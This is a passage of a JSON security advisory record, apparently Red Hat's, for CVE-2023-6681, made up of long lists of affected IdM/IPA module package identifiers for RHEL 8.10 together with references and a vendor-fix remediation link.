"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6681"
},
{
"category": "external",
"summary": "RHBZ#2260843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260843"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6681"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6681",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6681"
}
],
"release_date": "2023-12-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-22T11:47:22+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
